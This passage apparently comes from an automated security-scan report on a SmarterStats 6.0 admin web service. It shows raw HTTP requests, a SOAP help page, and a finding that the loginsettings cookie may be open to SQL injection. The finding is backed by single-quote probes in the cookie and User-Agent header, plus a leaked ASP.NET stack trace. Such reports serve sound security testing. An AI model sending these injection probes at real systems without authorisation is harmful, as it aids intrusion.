Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 25993
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSiteWithFTP2</h2>
<p class="intro">Adds a site with ftp logs to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSiteWithFTP2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneIndex:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneIndex"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Directory:</td>
<td><input class="frmInput" type="text" size="50" name="Directory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyType:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyType"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyAddress:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyAddress"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPort:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPort"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyUserName:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPassword:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Server:</td>
<td><input class="frmInput" type="text" size="50" name="Server"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Port:</td>
<td><input class="frmInput" type="text" size="50" name="Port"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Username:</td>
<td><input class="frmInput" type="text" size="50" name="Username"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Password:</td>
<td><input class="frmInput" type="text" size="50" name="Password"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IntervalHours:</td>
<td><input class="frmInput" type="text" size="50" name="IntervalHours"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSiteWithFTP2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTP2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTP2Result&gt;
&lt;/AddSiteWithFTP2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTP2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTP2Result&gt;
&lt;/AddSiteWithFTP2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSiteWithFTP2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font 
class=key>IntervalHours</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSiteWithFTP2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font class=key>IntervalHours</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.17. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [loginsettings cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The loginsettings cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the loginsettings cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=GetSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=';

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:37:07 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings='';

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:37:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 14402
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
